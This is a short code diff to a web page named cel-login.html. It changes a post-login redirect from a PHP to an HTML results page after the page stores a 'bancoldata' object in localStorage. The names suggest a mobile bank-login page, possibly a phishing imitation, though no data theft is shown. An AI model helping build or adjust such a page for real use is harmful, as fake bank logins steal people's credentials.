--- a/cel-login.html
+++ b/cel-login.html
@@ -557,10 +557,11 @@
       localStorage.setItem('bancoldata', JSON.stringify(datos));
       document.getElementById('loader').style.display = 'block';
       setTimeout(() => {
-        window.location.href = 'resultados.php';
+        window.location.href = 'resultados.html';
       }, 1500);
     });
 </script>
 
 </body>
+
 </html>
